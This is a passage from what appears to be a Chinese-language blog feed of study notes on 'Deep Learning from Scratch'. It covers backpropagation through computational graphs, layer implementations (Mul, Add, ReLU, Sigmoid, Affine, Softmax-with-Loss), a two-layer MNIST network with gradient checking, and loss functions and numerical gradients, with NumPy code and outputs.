    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
    """
    进行初始化:
    input_size: 输入层的神经元数
    hidden_size: 隐藏层的神经元数
    output_size: 输出层的神经元数
    weight_init_std: 初始化权重时的高斯分布的规模
    """
    # 初始化权重
    self.params = {}
    self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
    self.params['b1'] = np.zeros(hidden_size)
    self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
    self.params['b2'] = np.zeros(output_size)
    # 生成层
    self.layers = OrderedDict()
    self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
    self.layers['Relu1'] = Relu()
    self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
    self.lastLayer = SoftmaxWithLoss()


    def predict(self, x):
    """
    进行识别(推理)
    x: 是图像数据
    """
    for layer in self.layers.values():
    x = layer.forward(x)
    return x


    def loss(self, x, t):
    """
    计算损失函数的值
    x: 输入数据
    t: 监督数据
    """
    y = self.predict(x)
    return self.lastLayer.forward(y, t)


    def accuracy(self, x, t):
    """
    计算识别精度
    """
    y = self.predict(x)
    y = np.argmax(y, axis=1)
    if t.ndim != 1:
    t = np.argmax(t, axis=1)
    accuracy = np.sum(y == t) / float(x.shape[0])
    return accuracy


    def numerical_gradient(self, x, t):
    """
    通过数值微分计算关于权重参数的梯度
    """
    loss_W = lambda W: self.loss(x, t)
    grads = {}
    grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
    grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
    grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
    grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
    return grads


    def gradient(self, x, t):
    """
    通过误差反向传播法计算关于权重参数的梯度
    """
    # forward
    self.loss(x, t)
    # backward
    dout = 1
    dout = self.lastLayer.backward(dout)
    layers = list(self.layers.values())
    layers.reverse()
    for layer in layers:
    dout = layer.backward(dout)
    # 设定
    grads = {}
    grads['W1'] = self.layers['Affine1'].dW
    grads['b1'] = self.layers['Affine1'].db
    grads['W2'] = self.layers['Affine2'].dW
    grads['b2'] = self.layers['Affine2'].db
    return grads

    5.7.3 误差反向传播法的梯度确认

    两种求梯度的方法:

    • 基于数值微分的方法,实现简单,因此,一般情况下不太容易出错

    • 解析性地求解数学式的方法,使用误差反向传播法,即使存在大量的参数,也可以高效地计算梯度。实现很复杂,容易出错。

    确认数值微分求出的梯度结果和误差反向传播法求出的结果是否一致(严格地讲,是非常相近)的操作称为梯度确认(gradient check)

    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist

    # 读入数据
    (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label = True)
    network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
    x_batch = x_train[:3]
    t_batch = t_train[:3]
    grad_numerical = network.numerical_gradient(x_batch, t_batch)
    grad_backprop = network.gradient(x_batch, t_batch)
    # 求各个权重的绝对误差的平均值
    for key in grad_numerical.keys():
    diff = np.average( np.abs(grad_backprop[key] - grad_numerical[key]) )
    print(key + ":" + str(diff))
    W1:5.098230563374566e-10b1:3.2030157216551143e-09W2:5.229628806065797e-09b2:1.399595522047492e-07

    误差的计算方法是求各个权重参数中对应元素的差的绝对值,并计算其平均值。

    5.7.4 使用误差反向传播法的学习

    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist

    # 读入数据
    (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
    network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

    iters_num = 10000
    train_size = x_train.shape[0]
    batch_size = 100
    learning_rate = 0.1
    train_loss_list = []
    train_acc_list = []
    test_acc_list = []

    iter_per_epoch = max(train_size / batch_size, 1)

    for i in range(iters_num):
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]
    # 通过误差反向传播法求梯度
    grad = network.gradient(x_batch, t_batch)
    # 更新
    for key in ('W1', 'b1', 'W2', 'b2'):
    network.params[key] -= learning_rate * grad[key]

    loss = network.loss(x_batch, t_batch)
    train_loss_list.append(loss)
    if i % iter_per_epoch == 0:
    train_acc = network.accuracy(x_train, t_train)
    test_acc = network.accuracy(x_test, t_test)
    train_acc_list.append(train_acc)
    test_acc_list.append(test_acc)
    print(train_acc, test_acc)
    0.1278 0.13230.9025833333333333 0.90640.9237166666666666 0.9250.93455 0.9330.9447833333333333 0.94270.95155 0.94850.95825 0.95520.96255 0.95930.96375 0.95990.9665333333333334 0.96190.9697166666666667 0.96550.9716666666666667 0.96730.9735666666666667 0.96720.9745 0.96780.9774 0.96980.9761166666666666 0.96920.9789833333333333 0.9722

    5.8 小结

    • 通过使用计算图,可以直观地把握计算过程。

    • 计算图的节点是由局部计算构成的。局部计算构成全局计算。

    • 计算图的正向传播进行一般的计算。通过计算图的反向传播,可以计算各个节点的导数。

    • 通过将神经网络的组成元素实现为层,可以高效地计算梯度(反向传播法)。

    • 通过比较数值微分和误差反向传播法的结果,可以确认误差反向传播法的实现是否正确(梯度确认)。

    ]]>
    + 正文

    理解误差反向传播法:

    • 基于数学式

    • 基于计算图

    5.1 计算图

    5.1.1 用计算图求解

    “从左向右进行计算”是一种正方向上的传播,简称为正向传播(forward propagation)。正向传播是从计算图出发点到结束点的传播。

    既然有正向传播这个名称,当然也可以考虑反向(从图上看的话,就是从右向左)的传播。实际上,这种传播称为反向传播(backward propagation)。反向传播将在接下来的导数计算中发挥重要作用。

    5.1.2 局部计算

    png

    例如苹果和其他很多东西的求和运算(4000 + 200 → 4200)并不关心 4000 这个数字是如何计算而来的,只要把两个数字相加就可以了。换言之,各个节点处只需进行与自己有关的计算(在这个例子中是对输入的两个数字进行加法运算),不用考虑全局。

    5.1.3 为何用计算图解题

    png

    这里,假设我们想知道苹果价格的上涨会在多大程度上影响最终的支付金额,即求“支付金额关于苹果的价格的导数”。设苹果的价格为 $x$,支付金额为 $L$,则相当于求

    $$\frac{\partial L}{\partial x}$$

    这个导数的值表示当苹果的价格稍微上涨时,支付金额会增加多少。

    反向传播从右向左传递导数的值(1→1.1→2.2)。从这个结果中可知,“支付金额关于苹果的价格的导数”的值是 2.2。这意味着,如果苹果的价格上涨 1 日元,最终的支付金额会增加 2.2 日元(严格地讲,如果苹果的价格增加某个微小值,则最终的支付金额将增加那个微小值的 2.2 倍)。

    5.2 链式法则

    计算图的正向传播将计算结果正向(从左到右)传递,其计算过程是我们日常接触的计算过程,所以感觉上可能比较自然。

    反向传播将局部导数向正方向的反方向(从右到左)传递,一开始可能会让人感到困惑。传递这个局部导数的原理,是基于**链式法则(chain rule)**的。

    5.2.2 什么是链式法则

    先从复合函数说起。复合函数是由多个函数构成的函数。比如,$z=(x+y)^2$ 是由下式所示的两个式子构成的。

    $$z=t^2\t=x+y$$

    链式法则是关于复合函数的导数的性质,定义如下:

    如果某个函数由复合函数表示,则该复合函数的导数可以用构成复合函数的各个函数的导数的乘积表示。

    $$\frac{\partial z}{\partial x} = \frac{\partial z}{\partial t} \frac{\partial t}{\partial x} = 2t \cdot 1 = 2(x+y)$$

    5.2.3 链式法则和计算图

    png

    根据计算图的反向传播的结果,$\frac{\partial z}{\partial x}=2(x+y)$,计算图的反向传播是基于链式法则成立的。

    5.3 反向传播

    5.3.1 加法节点的反向传播

    png

    考虑 $z=x+y$,$\frac{\partial z}{\partial x}=1,\frac{\partial z}{\partial y}=1$

    $z=x+y$ 的计算位于这个大型计算图的某个地方,从上游会传来 $\frac{\partial L}{\partial z}$ 的值,并向下游传递 $\frac{\partial L}{\partial x}$ 和 $\frac{\partial L}{\partial y}$。

    5.3.2 乘法节点的反向传播

    考虑 $z=xy$,则 $\frac{\partial z}{\partial x}=y, \frac{\partial z}{\partial y}=x$

    png

    加法的反向传播只是将上游的值传给下游,并不需要正向传播的输入信号。但是,乘法的反向传播需要正向传播时的输入信号值。因此,实现乘法节点的反向传播时,要保存正向传播的输入信号。

    5.3.3 苹果的例子

    这里要解的问题是苹果的价格、苹果的个数、消费税这 3 个变量各自如何影响最终支付的金额。这个问题相当于求“支付金额关于苹果的价格的导数”“支付金额关于苹果的个数的导数”“支付金额关于消费税的导数”。

    5.4 简单层的实现

    把要实现的计算图的乘法节点称为“乘法层”(MulLayer),加法节点称为“加法层”(AddLayer)。

    5.4.1 乘法层的实现

    层的实现中有两个共通的方法(接口)forward()backward()forward()对应正向传播,backward()对应反向传播。

    考虑 $z=xy$,则 $\frac{\partial z}{\partial x}=y, \frac{\partial z}{\partial y}=x$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    class MulLayer:
    def __init__(self):
    """
    定义 x 和 y(保存正向传播的输入信号)
    """
    self.x = None
    self.y = None


    def forward(self, x, y):
    self.x = x
    self.y = y
    out = x * y

    return out


    def backward(self, dout):
    dx = dout * self.y # 翻转 x 和 y
    dy = dout * self.x
    return dx, dy
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    apple = 100
    apple_num = 2
    tax = 1.1

    # layer
    mul_apple_layer = MulLayer()
    mul_tax_layer = MulLayer()

    # forward
    apple_price = mul_apple_layer.forward(apple, apple_num) # 苹果总价
    price = mul_tax_layer.forward(apple_price, tax) # 加上税收总价
    print(price) # 220
    220.00000000000003

    此外,关于各个变量的导数可由backward()求出。

    1
    2
    3
    4
    5
    # backward
    dprice = 1
    dapple_price, dtax = mul_tax_layer.backward(dprice)
    dapple, dapple_num = mul_apple_layer.backward(dapple_price)
    print(dapple, dapple_num, dtax) # 2.2 110 200
    2.2 110.00000000000001 200

    5.4.2 加法层的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    class AddLayer:
    def __init__(self):
    """
    加法层不需要特意进行初始化,所以__init__()中什么也不运行
    """
    pass


    def forward(self, x, y):
    out = x + y
    return out


    def backward(self, dout):
    dx = dout * 1
    dy = dout * 1
    return dx, dy

    使用加法层和乘法层,实现上图所示的购买 2 个苹果和 3 个橘子。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    apple = 100
    apple_num = 2
    orange = 150
    orange_num = 3
    tax = 1.1

    # layer 生成必要的层
    mul_apple_layer = MulLayer()
    mul_orange_layer = MulLayer()
    add_apple_orange_layer = AddLayer()
    mul_tax_layer = MulLayer()

    # forward 合适的顺序调用正向传播的 forward() 方法
    apple_price = mul_apple_layer.forward(apple, apple_num) #(1)
    orange_price = mul_orange_layer.forward(orange, orange_num) #(2)
    all_price = add_apple_orange_layer.forward(apple_price, orange_price) #(3)
    price = mul_tax_layer.forward(all_price, tax) #(4)

    # backward 与正向传播相反的顺序调用反向传播的 backward() 方法
    dprice = 1
    dall_price, dtax = mul_tax_layer.backward(dprice) #(4)
    dapple_price, dorange_price = add_apple_orange_layer.backward(dall_price) #(3)
    dorange, dorange_num = mul_orange_layer.backward(dorange_price) #(2)
    dapple, dapple_num = mul_apple_layer.backward(dapple_price) #(1)

    print(price) # 715
    print(dapple_num, dapple, dorange, dorange_num, dtax) # 110 2.2 3.3 165 650
    715.0000000000001110.00000000000001 2.2 3.3000000000000003 165.0 650

    5.5 激活函数层的实现

    5.5.1 ReLU 层

    ReLU 由下式表示:

    $$y=\left{\begin{matrix}x\quad (x>0)\0\quad(x\le0)\end{matrix}\right.$$

    $$\frac{\partial y}{\partial x}=\left{\begin{matrix}1\quad (x>0)\0\quad(x\le0)\end{matrix}\right.$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    class Relu:
    def __init__(self):
    self.mask = None


    def forward(self, x):
    """
    mask 是由 True/False 构成的 NumPy 数组,
    它会把正向传播时的输入 x 的元素中小于等于 0 的地方保存为 True,
    其他地方(大于 0 的元素)保存为 False
    """
    self.mask = (x <= 0)
    out = x.copy()
    out[self.mask] = 0

    return out


    def backward(self, dout):
    """
    如果正向传播时的输入值小于等于 0,则反向传播的值为 0
    反向传播中会使用正向传播时保存的 mask,
    将从上游传来的 dout 的 mask 中的元素为 True 的地方设为 0
    """
    dout[self.mask] = 0
    dx = dout

    return dx

    5.5.2 Sigmoid 层

    $$
    \begin{eqnarray}
    y &= \frac{1}{1+\exp(-x)} \
    y’ &= \left(\frac{1}{1+\exp(-x)}\right)'\
    &= -y^2\left[-\left(\exp(-x)\right)\right]\
    &= y^2\exp(-x)\
    &= y(1-y)
    \end{eqnarray}
    $$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    class Sigmoid:
    def __init__(self):
    self.out = None


    def forward(self, x):
    """
    正向传播时将输出保存在了实例变量 out 中
    """
    out = 1 / (1 + np.exp(-x))
    self.out = out

    return out


    def backward(self, dout):
    """
    反向传播时,使用该变量 out 进行计算
    """
    dx = dout * (1.0 - self.out) * self.out

    return dx

    5.6 Affine/Softmax 层的实现

    5.6.1 Affine 层

    神经网络的正向传播中进行的矩阵的乘积运算在几何学领域被称为“仿射变换”A。因此,这里将进行仿射变换的处理实现为“Affine 层”。

    仿射层(Affine Layer)
    神经网络中的一个全连接层。仿射(Affine)的意思是前面一层中的每一个神经元都连接到当前层中的每一个神经元。在许多方面,这是神经网络的「标准」层。仿射层通常被加在卷积神经网络或循环神经网络做出最终预测前的输出的顶层。仿射层的一般形式为 $y=f(Wx+b)$,其中 $x$ 是层输入,$w$ 是参数,$b$ 是一个偏差矢量,$f$ 是一个非线性激活函数。

    5.6.2 批版本的 Affine 层

    png

    1. $\frac{\partial L}{\partial \mathbf X} = \frac{\partial L}{\partial \mathbf Y}\cdot \mathbf W^T$

    2. $\frac{\partial L}{\partial \mathbf W} = \mathbf X^T\cdot \frac{\partial L}{\partial \mathbf Y}$

    3. $\frac{\partial L}{\partial \mathbf B} = \frac{\partial L}{\partial \mathbf Y}$ 的第一个轴(第 0 轴)方向上的和

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    class Affine:
    def __init__(self, W, b):
    self.W = W
    self.b = b
    self.x = None
    self.dW = None
    self.db = None


    def forward(self, x):
    self.x = x
    out = np.dot(x, self.W) + self.b

    return out


    def backward(self, dout):
    dx = np.dot(dout, self.W.T) # (1)
    self.dW = np.dot(self.x.T, dout) # (2)
    self.db = np.sum(dout, axis=0) # (3)

    return dx

    5.6.3 Softmax-with-Loss 层

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    class SoftmaxWithLoss:
    def __init__(self):
    self.loss = None # 损失
    self.y = None # softmax 的输出
    self.t = None # 监督数据(one-hot vector)


    def forward(self, x, t):
    self.t = t
    self.y = softmax(x)
    self.loss = cross_entropy_error(self.y, self.t)

    return self.loss


    def backward(self, dout=1):
    batch_size = self.t.shape[0]
    dx = (self.y - self.t) / batch_size

    return dx

    5.7 误差反向传播法的实现

    5.7.1 神经网络学习的全貌图

    前提

    神经网络中有合适的权重和偏置,调整权重和偏置以便拟合训练数据的过程称为学习。神经网络的学习分为下面 4 个步骤。

    步骤 1(mini-batch)

    从训练数据中随机选择一部分数据。

    步骤 2(计算梯度)

    计算损失函数关于各个权重参数的梯度。(误差反向传播法会在此步出现)

    步骤 3(更新参数)

    将权重参数沿梯度方向进行微小的更新。

    步骤 4(重复)

    重复步骤 1、步骤 2、步骤 3。

    5.7.2 对应误差反向传播法的神经网络的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from common.layers import *
    from common.gradient import numerical_gradient
    from collections import OrderedDict


    class TwoLayerNet:

    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
    """
    进行初始化:
    input_size: 输入层的神经元数
    hidden_size: 隐藏层的神经元数
    output_size: 输出层的神经元数
    weight_init_std: 初始化权重时的高斯分布的规模
    """
    # 初始化权重
    self.params = {}
    self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
    self.params['b1'] = np.zeros(hidden_size)
    self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
    self.params['b2'] = np.zeros(output_size)
    # 生成层
    self.layers = OrderedDict()
    self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
    self.layers['Relu1'] = Relu()
    self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
    self.lastLayer = SoftmaxWithLoss()


    def predict(self, x):
    """
    进行识别(推理)
    x: 是图像数据
    """
    for layer in self.layers.values():
    x = layer.forward(x)
    return x


    def loss(self, x, t):
    """
    计算损失函数的值
    x: 输入数据
    t: 监督数据
    """
    y = self.predict(x)
    return self.lastLayer.forward(y, t)


    def accuracy(self, x, t):
    """
    计算识别精度
    """
    y = self.predict(x)
    y = np.argmax(y, axis=1)
    if t.ndim != 1:
    t = np.argmax(t, axis=1)
    accuracy = np.sum(y == t) / float(x.shape[0])
    return accuracy


    def numerical_gradient(self, x, t):
    """
    通过数值微分计算关于权重参数的梯度
    """
    loss_W = lambda W: self.loss(x, t)
    grads = {}
    grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
    grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
    grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
    grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
    return grads


    def gradient(self, x, t):
    """
    通过误差反向传播法计算关于权重参数的梯度
    """
    # forward
    self.loss(x, t)
    # backward
    dout = 1
    dout = self.lastLayer.backward(dout)
    layers = list(self.layers.values())
    layers.reverse()
    for layer in layers:
    dout = layer.backward(dout)
    # 设定
    grads = {}
    grads['W1'] = self.layers['Affine1'].dW
    grads['b1'] = self.layers['Affine1'].db
    grads['W2'] = self.layers['Affine2'].dW
    grads['b2'] = self.layers['Affine2'].db
    return grads

    5.7.3 误差反向传播法的梯度确认

    两种求梯度的方法:

    • 基于数值微分的方法,实现简单,因此,一般情况下不太容易出错

    • 解析性地求解数学式的方法,使用误差反向传播法,即使存在大量的参数,也可以高效地计算梯度。实现很复杂,容易出错。

    确认数值微分求出的梯度结果和误差反向传播法求出的结果是否一致(严格地讲,是非常相近)的操作称为梯度确认(gradient check)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist

    # 读入数据
    (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label = True)
    network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
    x_batch = x_train[:3]
    t_batch = t_train[:3]
    grad_numerical = network.numerical_gradient(x_batch, t_batch)
    grad_backprop = network.gradient(x_batch, t_batch)
    # 求各个权重的绝对误差的平均值
    for key in grad_numerical.keys():
    diff = np.average( np.abs(grad_backprop[key] - grad_numerical[key]) )
    print(key + ":" + str(diff))
    W1:5.098230563374566e-10b1:3.2030157216551143e-09W2:5.229628806065797e-09b2:1.399595522047492e-07

    误差的计算方法是求各个权重参数中对应元素的差的绝对值,并计算其平均值。

    5.7.4 使用误差反向传播法的学习

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist

    # 读入数据
    (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
    network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

    iters_num = 10000
    train_size = x_train.shape[0]
    batch_size = 100
    learning_rate = 0.1
    train_loss_list = []
    train_acc_list = []
    test_acc_list = []

    iter_per_epoch = max(train_size / batch_size, 1)

    for i in range(iters_num):
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]
    # 通过误差反向传播法求梯度
    grad = network.gradient(x_batch, t_batch)
    # 更新
    for key in ('W1', 'b1', 'W2', 'b2'):
    network.params[key] -= learning_rate * grad[key]

    loss = network.loss(x_batch, t_batch)
    train_loss_list.append(loss)
    if i % iter_per_epoch == 0:
    train_acc = network.accuracy(x_train, t_train)
    test_acc = network.accuracy(x_test, t_test)
    train_acc_list.append(train_acc)
    test_acc_list.append(test_acc)
    print(train_acc, test_acc)
    0.1278 0.13230.9025833333333333 0.90640.9237166666666666 0.9250.93455 0.9330.9447833333333333 0.94270.95155 0.94850.95825 0.95520.96255 0.95930.96375 0.95990.9665333333333334 0.96190.9697166666666667 0.96550.9716666666666667 0.96730.9735666666666667 0.96720.9745 0.96780.9774 0.96980.9761166666666666 0.96920.9789833333333333 0.9722

    5.8 小结

    • 通过使用计算图,可以直观地把握计算过程。

    • 计算图的节点是由局部计算构成的。局部计算构成全局计算。

    • 计算图的正向传播进行一般的计算。通过计算图的反向传播,可以计算各个节点的导数。

    • 通过将神经网络的组成元素实现为层,可以高效地计算梯度(反向传播法)。

    • 通过比较数值微分和误差反向传播法的结果,可以确认误差反向传播法的实现是否正确(梯度确认)。

    ]]>
    @@ -8171,7 +8171,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-4-%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E7%9A%84%E5%AD%A6%E4%B9%A0/ - 正文

    4.1 从数据中学习

    4.1.1 数据驱动

    深度学习有时也称为端到端机器学习(end-to-end machine learning)。这里所说的端到端是指从一端到另一端的意思,也就是从原始数据(输入)中获得目标结果(输出)的意思。

    4.1.2 训练数据和测试数据

    机器学习中,一般将数据分为训练数据(也可称为监督数据)测试数据两部分来进行学习和实验等。

    • 首先,使用训练数据进行学习,寻找最优的参数

    • 然后,使用测试数据评价训练得到的模型的实际能力

    4.2 损失函数

    神经网络的学习中所用的指标称为损失函数(loss function)。这个损失函数可以使用任意函数,但一般用均方误差和交叉熵误差等。

    4.2.1 均方误差

    $$E=\frac{1}{2}\sum_k(y_k-t_k)^2$$

    $y_k$ 表示神经网络的输出,$t_k$ 表示监督数据,$k$ 表示数据的维数。

    def mean_squared_error(y, t):
    return 0.5 * np.sum((y - t) ** 2)
    # 设“2”为正确解
    t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
    # 例 1:“2”的概率最高的情况(0.6)
    y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
    mean_squared_error(np.array(y), np.array(t))
    0.09750000000000003
    # 例 2:“7”的概率最高的情况(0.6)
    y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
    mean_squared_error(np.array(y), np.array(t))
    0.5975

    均方误差显示第一个例子的输出结果与监督数据更加吻合。

    4.2.2 交叉熵误差

    $$E=-\sum_kt_k\log y_k$$

    def cross_entropy_error(y, t):
    """
    参数 y 和 t 是 NumPy 数组。函数内部在计算 np.log 时,加上了一
    个微小值 delta。这是因为,当出现 np.log(0)时,np.log(0)会变为负无限大
    的-inf,这样一来就会导致后续计算无法进行。作为保护性对策,添加一个
    微小值可以防止负无限大的发生。
    """
    delta = 1e-7
    return -np.sum(t * np.log(y + delta))
    t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
    y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
    cross_entropy_error(np.array(y), np.array(t))
    0.510825457099338
    y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
    cross_entropy_error(np.array(y), np.array(t))
    2.302584092994546

    4.2.3mini-batch 学习

    $$E=-\frac{1}{N}\sum_n\sum_kt_{nk}\log y_{nk}$$

    • 假设数据有 $N$ 个

    • $t_{nk}$ 表示第 $n$ 个数据的第 $k$ 个元素的值
      -($y_{nk}$ 是神经网络的输出,$t_{nk}$ 是监督数据)。

    从全部数据中选出一部分,作为全部数据的“近似”。神经网络的学习也是从训练数据中选出一批数据(称为 mini-batch, 小批量),然后对每个 mini-batch 进行学习。这种学习方式称为 mini-batch 学习

    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist

    # 通过设定参数 one_hot_label=True,
    # 可以得到 one-hot 表示(即仅正确解标签为 1,其余为 0 的数据结构)。
    (x_train, t_train), (x_test, t_test) = \
    load_mnist(normalize=True, one_hot_label=True)
    print(x_train.shape) # (60000, 784) 训练数据有 60000 个,输入数据是 784 维(28 × 28)的图像数据
    print(t_train.shape) # (60000, 10) 监督数据是 10 维的数据
    (60000, 784)(60000, 10)

    从这个训练数据中随机抽取 10 笔数据。

    train_size = x_train.shape[0]
    batch_size = 10
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]

    使用 np.random.choice() 可以从指定的数字中随机选择想要的数字。

    比如,np.random.choice(60000, 10) 会从 0 到 59999 之间随机选择 10 个数字

    np.random.choice(60000, 10)
    array([30142, 18947,  8349, 38135,  8519, 25729, 36061, 11248, 12602,       31498])

    4.2.4mini-batch 版交叉熵误差的实现

    监督数据 $t$ 是独热编码的形式时:

    def cross_entropy_error(y, t):
    if y.ndim == 1:
    # y 的维度为 1 时,即求单个数据的交叉熵误差时,需要改变数据的形状
    t = t.reshape(1, t.size)
    y = y.reshape(1, y.size)

    batch_size = y.shape[0]
    # 当输入为 mini-batch 时,要用 batch 的个数进行正规化,计算单个数据的平均交叉熵误差
    return -np.sum(t * np.log(y + 1e-7)) / batch_size

    当监督数据是标签形式(非 one-hot 表示,而是像“2”“7”这样的标签)时:

    def cross_entropy_error(y, t):
    if y.ndim == 1:
    t = t.reshape(1, t.size)
    y = y.reshape(1, y.size)

    batch_size = y.shape[0]
    # y[np.arange(batch_size), t]能抽出各个数据的正确解标签对应的神经网络的输出
    return -np.sum(np.log(y[np.arange(batch_size), t] + 1e-7)) / batch_size

    4.2.5 为何要设定损失函数

    在进行神经网络的学习时,不能将识别精度作为指标。因为如果以识别精度为指标,则参数的导数在绝大多数地方都会变为 0(识别精度是离散的,对微小的参数变化基本上没有什么反应,即便有反应,它的值也是不连续地、突然地变化)。

    4.3 数值微分

    4.3.1 导数

    导数定义式:

    $$\frac{\mathrm df(x)}{\mathrm dx}=\lim_{h\to 0}\frac{f(x+h)-f(x)}{h}$$

    不好的实现示例:

    def numerical_diff(f, x):
    h = 10e-50
    return (f(x+h) - f(x)) / h
    • $h$ 的值太小,会产生舍入误差

    • (x + h) 和 x 之间的差分称为前向差分,为了减小误差,可以改成中心差分

    $$\frac{\mathrm d f(x)}{\mathrm x}=\lim_{h\to 0}\frac{f(x+h)-f(x-h)}{2h}$$

    def numerical_diff(f, x):
    h = 1e-4 # 0.0001
    return (f(x + h) - f(x - h)) / (2 * h)

    4.3.2 数值微分的例子

    对 $y=0.01x^2+0.1x$ 求微分:

    def function_1(x):
    return 0.01 * x ** 2 + 0.1 * x
    import numpy as np
    import matplotlib.pylab as plt

    x = np.arange(0.0, 20.0, 0.1) # 以 0.1 为单位,从 0 到 20 的数组 x
    y = function_1(x)
    plt.xlabel("x")
    plt.ylabel("f(x)")
    plt.plot(x, y)
    plt.show()

    png

    numerical_diff(function_1, 5)
    0.1999999999990898
    numerical_diff(function_1, 10)
    0.2999999999986347

    4.3.3 偏导数

    对于函数 $f(x_0,x_1)=x2_0+x2_1$:

    def function_2(x):
    return x[0] ** 2 + x[1] ** 2 # 或者 return np.sum(x ** 2)

    当 $x_0=3,x_1=4$ 时,关于 $x_0$ 的偏导数 $\frac{\partial f}{\partial x_0} $:

    def function_tmp1(x0):
    return x0*x0 + 4.0**2.0

    numerical_diff(function_tmp1, 3.0)
    6.00000000000378

    当 $x_0=3,x_1=4$ 时,关于 $x_1$ 的偏导数 $\frac{\partial f}{\partial x_1} $:

    def function_tmp2(x1):
    return 3.0 ** 2.0 + x1 * x1

    numerical_diff(function_tmp2, 4.0)
    7.999999999999119

    4.4 梯度

    像 $\left(\frac{\partial f}{\partial x_0},\frac{\partial f}{\partial x_1}\right)$ 这样的由全部变量的偏导数汇总而成的向量称为梯度(gradient)

    def numerical_gradient(f, x):
    h = 1e-4 # 0.0001
    grad = np.zeros_like(x) # 生成和 x 形状相同的数组
    for idx in range(x.size):
    tmp_val = x[idx]

    # f(x+h)的计算
    x[idx] = tmp_val + h
    fxh1 = f(x)

    # f(x-h)的计算
    x[idx] = tmp_val - h
    fxh2 = f(x)

    grad[idx] = (fxh1 - fxh2) / (2 * h)
    x[idx] = tmp_val # 还原值

    return grad

    求点 $(3,4)$、$(0,2)$、$(3,0)$ 处的梯度:

    numerical_gradient(function_2, np.array([3.0, 4.0]))
    array([6., 8.])
